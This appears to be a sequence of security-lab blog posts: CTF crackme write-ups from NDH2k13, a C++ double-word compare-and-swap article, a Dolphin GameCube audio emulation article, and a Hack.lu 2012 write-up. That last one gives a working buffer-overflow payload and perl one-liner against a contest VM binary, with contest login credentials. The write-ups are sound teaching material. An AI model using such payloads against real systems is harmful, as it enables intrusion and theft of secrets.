them in order to use them as a DWORD interm_dword = stock_intermediate_state(interm_byte) #The Red Block output the new token new_token = apply_xor_with_previous(previous_token, interm_dword) return new_token gen_per_min = (314.0/1346) diff_min = 72348 diff = int(gen_per_min * diff_min) for i in xrange(diff + 100): previous_token = next_token(previous_token) if previous_token == 0x7113aad3: print "FOUND: " + str(i) + " - " + hex(previous_token) if diff - 100 <= i <= diff + 100: print str(i) + " : " + "{0:08x}".format(previous_token)
NDH2k13 crackme500 writeup
Reverse of a vm for finding the password Score 500 Link http://quals.nuitduhack.com/files/attachments/crackme.zip
The program was an elf x86_64, statically linked executable. When launching the crackme it just prints some stuff, then asks for a password on the standart input and finally writes “Bad Password”.
When launching the command file on the crackme we first obtained the following response:
corrupted section header size
The same warning occurs with readelf on a more verbose way:
readelf: Warning: possibly corrupt ELF file header - it has a non-zero section header offset, but no section headers
IDA puts some warning too when opening the file even though it doesn’t impact it, however, gdb doesn’t like it at all and refuses to load the file.
Looking in the elf header we can see that the offset given for the section header offset was 1337, just put it all at 0 and everything goes back in order.
Now that this is fixed we can look into the code. The program starts with some init: just printing the first string and then initializing the vm.
After some time spent understanding how the vm worked I was able to find a comparaison between two numbers, if the test failed the program was printing “Bad Password” and exited. The first number was 9 and the second the size of my entry including the ‘\n’. So we know now that the password had 8 letters.
If the test was a success we entered in a loop which xored the value of the letters and a value at an address, and then compared them with an other value. When the test was a success the program continued, else it printed “Bad Password” and then exited. If all the tests were a success it printed “Good Password” and exited.
Dumping the values with which the letter xored we obtained:
0x12 0x21 0x02 0x19 0x25 0x34 0x29 0x11
And dumping the values which was compared:
0x53 0x5b 0x4b 0x29 0x52 0x76 0x5a 0x49
In order to obtain the password in clear we just had to xor them and we obtained the key :
```text AzI0wBsX
NDH2K13 crackme300 writeup
Connect to the remote machine and break the code. Oh wait, maybe you'll need some tools. Score 300 Link ssh://user:ndh2k13@z0b.nuitduhack.com:2222/
We are able to retrieve two files:
- an ELF asking for a password
- a vmlinux
Launching
crackme
on my box failed miserably. The code didn’t make any sense and the e_flags field of the ELF header which was supposed to be 0 was equal to 0x20.As we were provided with a vmlinux, I guessed the ELF loading routine of the kernel had been modified to check if e_flags was 0x20, and in this case apply some operation. When reversing
load_elf_binary
(fs/binfmt_elf.c
), you see that the code is xored. It can be fixed with the following code:#include <stdio.h> #define OFFSET (0x610) #define SIZE (0x418 + 0xe + 0x28) int main(int argc, char** argv) { char key[] = "\x12\x43\x34\x65\x78\xcf\xdc\xca\x98\x90" "\x65\x31\x21\x56\x83\xfa\xcd\x30\xfd\x12" "\x84\x98\xb7\x54\xa5\x62\x61\xf9\xe3\x09" "\xc8\x94\x12\xe6\x87"; FILE* f = fopen(argv[1], "r+"); char buf[SIZE]; fseek(f, OFFSET, SEEK_SET); fread(buf, 1, SIZE, f); for (int i = 0; i < SIZE; ++i) buf[i] = buf[i] ^ key[i % 35]; fseek(f, OFFSET, SEEK_SET); fwrite(buf, 1, SIZE, f); fclose(f); return 0; }
Now that we have a working ELF, we can look at it and see that it a quite straightforward to reverse. There may only be four different characters:
- w
- a
- s
- d
Looking closer, we can see that there is to globals, which begin at 0, and that must both be equals to 15 to have the right password. We can also se that there is a 16x16 table filled with ones and zeroes, and the globals (which are in fact w and h position in the table) must point to a 0 (it’s a maze, you must get from (0, 0) to (15, 15) without going through a wall).
The following python script find the correct sequence of keys, which is the key:
#! /usr/bin/env python3 import sys TABLE = [ 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, ] CHARS = { "w" : "wad", "s" : "sad", "a" : "was", "d" : "wsd", } def get_counts(key): count_1 = 0 count_2 = 0 for i in key: if i == 's': count_1 += 1 elif i == 'd': count_2 += 1 elif i == 'w': count_1 -= 1 else: count_2 -= 1 return count_1, count_2 def test(key): count_1, count_2 = get_counts(key) if count_1 == 15 and count_2 == 15: print(key) sys.exit(0) if count_1 < 0 or count_2 < 0 or count_1 > 15 or count_2 > 15: return False offset = (count_1 << 4) + count_2 if TABLE[offset] != 0: return False print(key) for c in CHARS[key[-1:]]: test(key + c) return False test("s")
Key is:
```text ssddsssassdddssssdssaawaasssddddddwwwwwwddwwwwwdwwdddsssssaassssaasssddddwwddsss
Implementing generic double-word compare and swap for x86/x86-64
Most lock-free data structures rely on atomic compare and swap (CAS) operation and in order to solve ABA issue the CAS must work on a double word (a pointer and a counter.) Implementing such kind of pointer is often tedious and error prone. In particular, for Intel x86, 32bit and 64bit code use a different mnemonic. This article present a template based implementation that hides the hard stuff.
Since the introduction of multi-core processors, parallel computing is growing in attention. While lock-based techniques have been studied for a long time, modern HPC require more scalable data structures. Lock-free data structures have proven better scaling by avoiding thread blocking.
But avoiding locks introduces new issues, among which the so-called ABA problem (see next section.) There exists various strategy to avoid this issue, and among all the use of atomic CAS on double word pointers seems the less intrusive one (other choices may rely on aspect that may not be available in all context: garbage collector or Load-Link/Store-Condition for example.)
Implementing a double-word CAS is tedious, you have to inline some assembly code and most of all your code is word size dependent. Here is a simple solution to implement such a CAS with gcc-style inline assembly and C++ template for x86 and x86-64 processors.
But, let’s start with quick description of the ABA problem.
The ABA problem
Classical lock-free data structures often use a simple retry-strategy based on the idea that one fetch the desired pointer, access inner data and then try to update the pointer in the structure, if the pointer has changed since we fetch it, the algorithm simply retry by fetching it again.
The ABA issue may appears when the change to the pointer may not be visible simply reading the address. Let’s see the scenario:
- Thread 0 access the pointer in the structure and read address A
- Thread 1 change the pointer with address B and invalidate address A
- Thread 2 (or Thread 1) allocate a new cell at address A and again update the main pointer and write A
- Thread 0 test the pointer (with a CAS) and find A, since the pointer doesn’t seem to have changed, it will silently consider that nothing has changed.
If the first thread has already read content of the cell, this content will be out-of-date.
To prevent this issue, we have several strategies. Most strategies rely on different memory management approach such as garbage collection (in a garbage collected paradigm, the cell at address A won’t be invalidate since it is hold by someone, and thus it can’t be reused.)
But garbage collection introduces more parallel issues and requires some sort of language integration. It is acceptable when it is already part of the environment (like in Java), but you don’t want it when building high-performance application in less high-level languages (such as C/C++.)
Other solutions based on transactional memory or LL/SC operations have other drawback such as hardware requirements that are not standard.
Double-word CAS
A more simple way to solve the ABA issue used for example in the article from Micheal and Scott Simple, Fast, and Practical Non-Blocking and Blocking Concurrent Queue Algorithms, is to replace your pointer by a pair with a pointer and a counter.
The strategy is simple, each time the pointer is changed the counter is incremented, thus even if the address is the same the counter value will differ.
The only remaining issue is how to perform a double word CAS ?
Atomic CAS requires processor’s specific instructions, on the x86/x86-64 processors you’ll find that the CAS instruction is named cmpxchg.
But, as usual, this instruction has various versions depending on the size of the value to swap. So, if you want a double-word CAS for 32bit wide pointers, you’ll use cmpxchg8b and cmpxchg16b for 64bit wide pointers.
Note: GCC provides atomic operations, but these operations are limited to integral types, that is types with size less (or equal) to 8 bytes, but we need 16 bytes wide CAS.
Using cmpxchg for 32bit wide pointers
So, let’s start with the easy case: 32bit wide pointers. It’s easy because you have 64bit integral types (here we need some unsigned integer) directly defined.
The double-word CAS will look like that:
uint64_t cas(uint64_t* adr, uint64_t nval, uint64_t cmp) { uint64_t old; __asm__ __volatile__( "lock cmpxchg8b %0\n\t" : "=a" (old) ,"+m" (*adr) : "d" ((uint32_t)(cmp >> 32)), "a" ((uint32_t)(cmp & 0xffffffff)) ,"c" ((uint32_t)(nval >> 32)), "b" ((uint32_t)(nval & 0xffffffff)) : "cc" ); }
Note: the previous code is doing some supposition upon the memory layout of the unsigned integer.
The cmpxchg8b atomically compare the given 8 bytes with the given values (in d and a), if the values matches it replaces the old value with the new one. In any case it returns the old value.
You may have notice the lock prefix. While cmpxchg8b is guaranteed to be atomic, the instruction doesn’t implies any memory barrier: re-ordering of fetch and store operations by the processor are not required to be consistent with the relative ordering of the instructions flow (so write operations lexically before the cmpxchg8b can actually take place after the CAS itself.) But, and this is more important, other processors may change the memory state during the execution of the cmpxchg8b ! The lock prefix enforce a global memory barrier (for the current processor but also for the other.) It also force cache line invalidation so other attempt to read the memory cell will require a real fetch in memory.
Why the memory barrier is not the default behavior of an atomic operation ? The memory barrier have a cost, and in some situation it is not required, thus it is simpler to provide the barrier as an option rather than a default behavior.
And a 64bit version ?
At first, it seems logical to simply replace cmpxchg8b by cmpxchg16b is the previous code to obtain a double-word CAS for 64bit wide pointer, no ?
Of course not, we don’t have a 128bits wide integer type (some compiler may provide such a type) so we have to embedded our pair in a struct (we’ll see the code later in the template version.) Beware that cmpxchg16b requires a memory operand aligned on 16 bytes boundaries.
But that’s not all. In the previous version, the CAS operation returns the old value, which is then often used to test if the operation has succeed or not. But, the compiler won’t let us simply compare structures like integers.
Hopefully, cmpxchg16b (as cmpxchg8b and cmpxchg) set an arithmetic flag indicating whether the operation has succeed or not ! Thus, we only have to do a setz to some Boolean-like value.
Taking everything together:
- we need a struct holding our pair (in fact we probably have it already)
- our compare and swap will return a Boolean value
- depending on the pointer size we should use cmpxchg8b or cmpxchg16b
Now, how can we have a unified code size dependent ?
Using template
In order to switch upon the size of pointer, we’ll use template.
Let see the code:
template<typename T,unsigned N=sizeof (uint32_t)> struct DPointer { public: union { uint64_t ui; struct { T* ptr; size_t count; }; }; DPointer() : ptr(NULL), count(0) {} DPointer(T* p) : ptr(p), count(0) {} DPointer(T* p, size_t c) : ptr(p), count(c) {} bool cas(DPointer<T,N> const& nval, DPointer<T,N> const & cmp) { bool result; __asm__ __volatile__( "lock cmpxchg8b %1\n\t" "setz %0\n" : "=q" (result) ,"+m" (ui) : "a" (cmp.ptr), "d" (cmp.count) ,"b" (nval.ptr), "c" (nval.count) : "cc" ); return result; } // We need == to work properly bool operator==(DPointer<T,N> const&x) { return x.ui == ui; } }; template<typename T> struct DPointer <T,sizeof (uint64_t)> { public: union { uint64_t ui[2]; struct { T* ptr; size_t count; } __attribute__ (( __aligned__( 16 ) )); }; DPointer() : ptr(NULL), count(0) {} DPointer(T* p) : ptr(p), count(0) {} DPointer(T* p, size_t c) : ptr(p), count(c) {} bool cas(DPointer<T,8> const& nval, DPointer<T,8> const& cmp) { bool result; __asm__ __volatile__ ( "lock cmpxchg16b %1\n\t" "setz %0\n" : "=q" ( result ) ,"+m" ( ui ) : "a" ( cmp.ptr ), "d" ( cmp.count ) ,"b" ( nval.ptr ), "c" ( nval.count ) : "cc" ); return result; } // We need == to work properly bool operator==(DPointer<T,8> const&x) { return x.ptr == ptr && x.count == count; } };
The first trick is to use an anonymous union (and an anonymous struct) in order to have access to the pointer and the counter directly, and a direct value access to the value as a whole itself for the assembly code. In fact, we probably can had done it without, but it simpler to read like that.
As you can see, the template as an integer parameter (that is not use) and is specialized upon it (for N=8.) Now, when you want to use our pointer, all you have to do is to instantiate our template with N=sizeof (void*).
An Example
Here is an quick’n’dirty implementation of the non-blocking concurrent queue described in the article by Micheal and Scott.
template<typename T> class Queue { public: struct Node; typedef DPointer<Node,sizeof (size_t)> Pointer; struct Node { T value; Pointer next; Node() : next(NULL) {} Node(T x, Node* nxt) : value(x), next(nxt) {} }; Pointer Head, Tail; Queue() { Node *node = new Node(); Head.ptr = Tail.ptr = node; } void push(T x); bool take(T& pvalue); }; template<typename T> void Queue<T>::push(T x) { Node *node = new Node(x,NULL); Pointer tail, next; do { tail = Tail; next = tail.ptr->next; if (tail == Tail) { if (next.ptr == NULL) { if (tail.ptr->next.cas(Pointer(node,next.count+1),next)) break; } else { Tail.cas(Pointer(next.ptr,tail.count+1), tail); } } } while (true); Tail.cas(Pointer(node,tail.count+1), tail); } template<typename T> bool Queue<T>::take(T& pvalue) { Pointer head, tail, next; do { head = Head; tail = Tail; next = head.ptr->next; if (head == Head) if (head.ptr == tail.ptr) { if (next.ptr == NULL) return false; Tail.cas(Pointer(next.ptr,tail.count+1), tail); } else { pvalue = next.ptr->value; if (Head.cas(Pointer(next.ptr,head.count+1), head)) break; } } while (true); delete(head.ptr); return true; }
Going further
There’s some possible enhancement of our pointer template:
- Our assembly code doesn’t support -fPIC relocation: by convention, ebx is supposed to be preserved in each block of code, so, we have to backup its value before using in the asm inline block.
- Not all operation are done atomically, in order to have a better complete implementation, we should override some operators.
Emulating the Gamecube audio processing in Dolphin
For the last two weeks, I’ve been working on enhancements and bug fixes related to audio processing in the Dolphin Emulator (the only Gamecube/Wii emulator that allows playing commercial games at the moment). Through this project I have learned a lot about how audio processing works in a Gamecube. Very little documentation is available on that subject, so I think writing an article explaining how it works might teach some new things to people interested in Gamecube/Wii homebrew development or emulators development. This article was first published in 3 parts on the Dolphin official forums. Before publishing it on the blog, I made some small changes (mostly proof-reading and adding some complementary images) but most explanations are the same.
If you’re interested in the code, it is available in the
new-ax-hle
branch on the official Google Code repository.Let’s start this exploration of audio emulation in a Gamecube emulator by looking at how the real hardware processes sound data.
How sound is processed in a Gamecube
There are three main internal components related to sound in a Gamecube: the ARAM, the AI and the DSP:
- ARAM is an auxiliary memory which is used to store sound data. The CPU cannot access ARAM directly, it can only read/write blocks of data from RAM to ARAM (or from ARAM to RAM) using DMA requests. As ARAM is quite large, games often use it to store more than sound data: for example, WWE Day of Reckoning 2 uses it to store animation data (and a bug in DMA handling causes a crash because the data it writes is corrupted).
- The AI (Audio Interface) is responsible for getting sound data from RAM and sending it to your TV. It performs an optional sample rate conversion (32KHz -> 48KHz) and converts the data to an analog signal that is sent through the cables to your audio output device. The input data is read at a regular interval from RAM (not ARAM), usually every 0.25ms 32 bytes of input data is read (each sound sample is 2 bytes, so 32 bytes is 16 sound samples, which is 8 stereo sound samples, and 8 samples every 0.25ms == 32KHz sound).
- The DSP is what processes all the sounds a game wants to play and outputs a single stereo stream. Its job is to perform volume changes on the sounds, sample rate conversion (converting 4KHz sounds which take less space to 32KHz sounds - this is needed because you can’t mix together sounds that are not the same rate). It can optionally do a lot of other stuff with the sounds (delaying to simulate 3D sound, filtering, handling surround sound, etc.).
Figure 1: Overview of all the components involved in audio processing in a Gamecube
ARAM and AI are not that hard to emulate: once you understand how they work, they are both simple chips which can only perform one function and don’t communicate a lot with the CPU. You just need to have a precise enough timing for AI emulation, and everything is fine.
DSP is a lot harder to emulate properly, for two reasons I have not mentioned yet. First, it is a programmable CPU. All the mixing, filtering, etc. are part of a program that is sent to the DSP by the game, and the DSP behavior varies depending on the program it receives. For example, the DSP is not only used for sound processing, but also to unlock memory cards, and to cipher/decipher data sent to a GBA using the official link cable. Even for sound processing, not every game uses the same DSP code. The second reason is that it can communicate with the main Gamecube CPU, read RAM and ARAM and write to RAM. This allows games to use a complicated communication protocol between CPU and DSP.
We call a program running on the DSP a UCode (“microcode”). Because the DSP is programmable, it would seem like the only way to emulate it properly is to use low level emulation: running instructions one by one from a program to reproduce accurately what the real DSP does. However, while it is programmable, there are actually very few different UCodes used by games. On Gamecube, there are only 3 UCodes we know of: the AX UCode (used in most games because it is distributed with Nintendo’s SDK), the Zelda UCode (called that way because it’s used in Zelda games, but it is also used for some Mario games and some other first party games), and the JAC UCode (early version of the Zelda UCode, used in the Gamecube IPL/BIOS as well as Luigi’s Mansion). That means if we can reproduce the behavior of these three UCodes, we can emulate the audio processing in most games without having to emulate the DSP instructions.
I started working on AX HLE 3 weeks ago because I want to play Skies of Arcadia Legends and Tales of Symphonia, two games that had completely broken audio with the previous AX HLE implementation. I added a new hack to “fix” the bug that caused bad music emulation, but fixing this made me even more interested in rewriting the whole thing to make it cleaner. I wasn’t following Dolphin development when the current AX HLE was developed. However, it looks to me as if it was written without actually looking at the DSP code, only looking at what is sent to the DSP and what comes out. I don’t know if people at the time had the capability to disassemble DSP code, but it is a very bad way to emulate AX anyway: some parts of the emulation code are completely WTF, and the more you understand how AX works the less you understand how the current AX HLE emulation was able to work and output sound in most cases. That’s why, two weeks ago I decided I should start from scratch and re-implement AX HLE.
AX UCode features and internals
AX is a low-level audio library for Gamecube games, which comes with a builtin UCode to perform audio signal processing on the DSP. I’ll first talk about what it can do, then explain how the UCode knows what it should do.
Luckily, Nintendo gives us a lot of information about the role of the DSP in a patent filed on Aug 23 2000: US7369665, “Method and apparatus for mixing sound signals”. Figures 8, 9A and 9B are especially interesting in our case because they describe precisely what the DSP does internally and how inputs and outputs interact with each other. That helps, but most of this information could already be discovered by reverse engineering the UCode anyway (I learned the existence of this patent pretty late).
The basic role of the DSP is to get several sounds and mix them together to give a single sound. The sounds that it has to mix are provided through a list of Parameter Blocks (PB). Each PB corresponds to a sound to be mixed. It contains where to find the input sound data, but also a lot of configuration options: input sample rate, sound volume, where it should be mixed and at what volume (left channel/right channel/surround), if the sounds loop, from where does the loop start, etc.
Figure 2: List of PBs with example fields. The PBADDR AX command gives the address of the first PB to the DSP.
Every 5ms AX gets a list of PB and mixes each PB to 3 channels: Left, Right and Surround. It then sends 5ms of output to the RAM, at an address provided by the CPU. Sometimes being able to change sound data only every 5ms is not enough: to overcome that, each PB has a list of updates to be applied every millisecond. This allows sub-5ms granularity in sound mixing configuration. AX also provides a way to add audio effects on the L/R/S streams through the use of AUX channels. Each PB can be mixed to L/R/S but also to AUXA L/R/S and AUXB L/R/S. Then, the CPU can ask to get the contents of the AUXA and AUXB mixing buffers, replace them with its own data, and ask the DSP to mix AUXA and AUXB with the main L/R/S channels.
That’s about it for the main features of AX. Some more things can be done optionally (for example Initial Time Delay, used to delay one channel to simulate 3D sound) but they are not used that often by games. Let’s see how the CPU sends commands to the DSP.
The DSP has two ways to communicate with the game: through DMA, which allows it to read or write to RAM at any address it wants, and through mailbox registers, which is a more synchronous way to exchange small amounts of data (32 bits at a time) with the CPU. Usually, mailbox registers are used for synchronization and simple commands. For more complicated commands the CPU sends an address to the DSP via mailbox, and the DSP gets the data at this address through DMA.
With AX, about the only thing received through mailboxes (excluding UCode switching stuff which is not relevant to sound processing) is an address to a larger block of data which contains commands for the DSP. Here is a few commands that AX understands and that I have reverse engineered:
- Command 00:
SETUP
, initializes internal mixing buffers with a constant value or a value and a delta. Usually just initializes to 0. - Command 02:
PBADDR
, gives the DSP the address in RAM of the first PB. Each PB contains the address of the next PB, so knowing only the address of the first PB is enough to get the whole list. - Command 03:
PROCESS
, does all the audio processing and mixes the PBs to internal buffers. - Command 04:
MIX_AUXA
, sends the contents of the AUXA buffers to the CPU, receives processed AUXA, and mix it with the main channels. - Command 05:
MIX_AUXB
, same asMIX_AUXA
for AUXB - Command 06:
UPLOAD_LRS
, sends the contents of the main L/R/S channels to the CPU. - Command 0D:
MORE
, read more commands from RAM and start executing them. I suspect this is used for long command lists, but I’ve never seen it used. - Command 0E:
OUTPUT
, interlaces L/R channel, clamp to 16 bits and send to RAM, where it will most likely get picked up by the Audio Interface. - Command 0F:
END
, signals the end of a command list.
A few more commands exist, but these commands are the main things to handle to get audio working in most games I’ve found. Actually, only handling
PBADDR
,PROCESS
,OUTPUT
andEND
should allow about 90% of games to have some of the audio working (without stuff like AUX effects, used for echo/reverb).When AX is done handling a command list, it sends an interrupt to the CPU to signal that it is ready to receive more data. This is very important because it is the only way for the CPU to know that the data it requested to be uploaded from the DSP is actually valid and done copying/processing. Then, at the next 5ms tick, the CPU will send a new command list to the DSP, and the cycle repeats.
Figure 3: Timeline of an AX 5ms frame handling
AX HLE in Dolphin, previous vs. new
DSP HLE was developed at a time when people did not know much about how the Gamecube DSP worked. It was basically a hack to have sound in games, and more hacks were added on top of that hack to try and fix bugs. The AX UCode emulation is probably the most hacky thing in the DSP HLE code. For example, some of the code that is used looks like this:
// TODO: WTF is going on here?!? // Volume control (ramping) static inline u16 ADPCM_Vol(u16 vol, u16 delta) { int x = vol; if (delta && delta < 0x5000) x += delta * 20 * 8; // unsure what the right step is //x += 1 * 20 * 8; else if (delta && delta > 0x5000) //x -= (0x10000 - delta); // this is to small, it's often 1 x -= (0x10000 - delta) * 20 * 16; // if this was 20 * 8 the sounds in Fire Emblem and Paper Mario // did not have time to go to zero before the were closed //x -= 1 * 20 * 16; // make lower limits if (x < 0) x = 0; //if (pb.mixer_control < 1000 && x < pb.mixer_control) x = pb.mixer_control; // does this make // any sense? // make upper limits //if (mixer_control > 1000 && x > mixer_control) x = mixer_control; // maybe mixer_control also // has a volume target? //if (x >= 0x7fff) x = 0x7fff; // this seems a little high //if (x >= 0x4e20) x = 0x4e20; // add a definitive limit at 20 000 if (x >= 0x8000) x = 0x8000; // clamp to 32768; return x; // update volume }
I don’t even know how this code evolved to become what it is displayed here, I just know that it is not a good way to implement AX HLE. Also, some of the design choices in the previous implementation just couldn’t allow for accurate HLE.
The first issue is that the audio emulation pipeline was simply not correct: the AI was completely bypassed, and sound went directly from the DSP to the emulated audio mixer, without being copied to RAM at any time. This “kind of” works but completely breaks CPU audio effects… which aren’t emulated anyway.
Figure 4: Audio emulation pipeline in the previous AX HLE implementation
But the biggest issue is the timing on which AX HLE was working. On real hardware, the DSP runs on its own clock. At some point the CPU sends commands to it, it processes all of these commands as fast as possible, and sends a message back to the CPU when it’s done. The CPU copies the processed data, then when it needs more data (in most cases, 5ms later) it sends new commands to the DSP. In the previous AX HLE implementation, none of that was right. What the emulated AX did was:
- As soon as we get the command that specified the sounds that should be mixed, copy the sound data address somewhere.
- Every 5ms send a message to the CPU saying that we processed the commands (even though no commands were processed)
- When the audio backend (ALSA, XAudio, DirectSound) requires more data, AX HLE mixed the sound and returned audio data.
Basically, nothing was right in the timing. That implementation allows for some cool hacks (like having the audio running at full speed even though the game is not running at 100% speed), but it is inaccurate and bug-prone.
When trying to fix the “missing instruments” bug affecting the games I wanted to play, I noticed all these timing issues and thought about rewriting AX HLE (once again… I always wanted to rewrite AX HLE every time I looked at the code). The hack fix (re4d18e3a8b7c) that I found to compensate for the timing issues really did not satisfy me, and knowing more about AX HLE I noticed that rewriting it was actually not as hard as I thought it would be. After working for 24h streight on
new-ax-hle
, I finally got a first working version which had ok sounds and music in Tales of Symphonia.The design in
new-ax-hle
is in my opinion a lot better than the design used in the previous AX HLE:- A DSP Thread is created when the UCode is loaded. This thread will be responsible for all the sound mixing work the DSP does.
- When we get commands from the CPU, we copy the command list to a temporary buffer, and wake up the DSP Thread to tell him we have commands to process.
- The DSP Thread handles the commands, sends a message to the CPU when it’s done, and goes back to sleep.
It is basically the exact same model DSP LLE on Thread (another DSP configuration option in Dolphin) uses, with less synchronization (LLE tries to match the number of cycles executed on CPU and DSP, which causes some extra performance hit). This also kind of matches what happens on the real hardware, using 2 chips instead of 2 threads. However, this also means the audio processing speed is tied to the CPU speed: if the CPU cannot keep up, it won’t send commands often enough and the audio backend won’t receive enough data to avoid stuttering.
Figure 5: Comparison of processing timelines. On the left, previous implementation. On the right, new-ax-hle.
Another change, this time not exactly linked to overall design, is that the
new-ax-hle
now handles most AX commands instead of only the one specifying the first parameter block address like the old AX does. Some of these other commands are used to set up global volume ramping, send data back to the main RAM, mix additional data from the RAM, or output samples to the buffers used by the audio interface. This means new-ax-hle now follows the correct audio emulation pipeline:ARAM -> DSP -> RAM -> AI -> Output
(instead of the pipeline used before:ARAM -> DSP -> Output
). This also means some CPU sound effects like echo, reverb, etc. should work fine.Figure 6: Audio emulation pipeline in the new AX HLE implementation
Overall, the more I fix bugs in
new-ax-hle
, the more I’m amazed the previous AX HLE could work so well. It is a pile of hacks, implementing only 2/19 AX commands (and one of these commands is not even implemented correctly), with a completely wrong timing, and some ugly code that makes no sense. I don’t blame the previous authors of this code - at the time, documentation about the DSP was a lot sparser, and analyzing UCodes had to be done with a text editor because there was no awesome IDA plugin for the GC DSP.Conclusion
At the time I’m writing this article,
new-ax-hle
works a lot better than the previous AX HLE in most Gamecube games, and only a few remaining bugs are known in GC games. The Wii AX code is a bit less mature and is more like a proof of concept: I haven’t really worked a lot on it, and after one or two weeks of bug fixing it should also become pretty much perfect, including Wiimote audio emulation (which was only supported with LLE previously). I’m hoping this code will be merged for 4.0, and I’ll most likely be working on Zelda UCode HLE next (which has a less ugly implementation but has the same design issues as AX).Thanks to Pierre-Marie (
pmderodat@lse
) for his nice Inkscape-made pictures.Hack.lu CTF 2012: Braingathering (500 points)
We fought our way to the main server room. The zombies realized that they run out of humans sooner or later, so they started to build machines to create humans for them to eat. Those machines have a special code which is only known to the zombies. This code is capable of destroying all breeding-machines. Now, it's all up to you to get this code and tell us so that we can destroy all machines. SSH: ctf.fluxfingers.net PORT: 2097 USER: ctf PASS: opPsyuXs7aaxtop credits: 500 +3 (1st), +2 (2nd), +1 (3rd)
Braingathering is an elf32 binary which asks for 3 choices:
- 1) Need Brainz brainz brainz, Zombie huuuungry!
- 2) How much longer till braaaiiiiinz?
- 3) Nooo more brainz! STOP THE BRAINZ!
The two first are not interesting, but the third asks us for a password and compares it with the content of the “killcode”. If the password entered by the user is right, it prints us:
YEAH, now go and submit the killcode so that we can stop other systems as well
So we need to leak this password or to get a shell to print the content of the file “killcode”.
Entry point of the binary is inside .plt section and has type NOBITS, if we try to open it in IDA, it will not show use the disassembly, so we must change section’s type to PROGBITS and we can see a simple deciphering loop.
loc_8048BC1: ; CODE XREF: start+1Aj mov eax, offset loc_8048500 mov ecx, 6A1h loc_8048BCD: ; CODE XREF: start-Aj xor byte ptr [eax], 8Ch inc eax dec ecx cmp ecx, 0 jg short loc_8048BCD
The binary xors bytes from
0x8048500
to0x8048ba1
with0x8C
, and jumps to0x8048500
, the real entry point. Fix is simple: write a simple C program to do the task for us. Now we can open it with IDA, and we can see a switch case with 246 entries, it’s definitively a VM.It’s friday night, and I was bored, so I decided to write an IDA processor for this vm:
Now we just have to dump the vm from offset
0x2060
to0x2847
, and use this processor: “brain VM CPU: brain”.The first thing the vm does is decyphering his code with xor
0x7A7A
from offset0x50
to0x1050
. Again the solution is to write a simple C program to do the task for us.Ok now we have the full code of the VM!
The only interesting sub is at offset
0x014E
, we can call ask-for-password, it is the sub for the third choice.The problem in this function is that a stack based buffer overflow can occur. It reserves
0x34
(52) bytes on the stack for the buffer, but reads on STDIN0x36
(54), so we can overwrite the return address of this sub inside the VM.0x187 MOV R4, $8000 0x18A MOV R1, $10 0x18D CALL memcpy
The password will be copied to address
0x8000
, and our buffer to0x7000
, to compare them in sub-functionsub_00FC
.The opcode
0x3F
is able to write a buffer to a file descriptor.0x3F opcode, write(*PC, R4, strlen(R4));
So the idea is to put in R4 the adress of the password and execute this opcode. The opcode
0x49
is perfect for this task :0x49 mov r4, [PC]
So the payload looks like this:
0x49 0x00 0x80 ; mov r4, 0x8000 0x40 0x01 ; write(STDOUT_FILENO, r4, strlen(R4)); 0x53 0x0D 0x70 ; Adresse return for sub_print_newline (buffer + 0xD) for ending correctly exploit 0x53 0x03 0x01 ; push 0x013E (@ of sub_print_newline) 0x58 ; ret "0xFF"*43 ; END VM 0x00 0x70 ; New Address to return (@buffer)
Result:
ctf@braingathering:~$ perl -e'print "3"x34 . "\x49\x00\x80" . "\x40\x01" . "\x53\x0d\x70" . "\x53\x3e\x01" . "\x58" . "\xFF"x40 . "\x00\x70"' > /tmp/payload ctf@braingathering:~$ /home/ctf/braingathering < /tmp/payload ==[ZOMBIE BRAIN AQUIREMENT SYSTEM]== Automated system for braingathering ready. 1) Need Brainz brainz brainz, Zombie huuuungry! 2) How much longer till braaaiiiiinz? 3) Nooo more brainz! STOP THE BRAINZ! X) Nah, I'm going to get my brains somewhere else. ### Warning: Only for authorized zombies ### Please enter teh z0mb13 k1llc0d3: Comparing k1llc0d3 INVALID OMG_VMAP0CALYPS3
Hack.lu CTF 2012: Zombies PPTP (450 points)
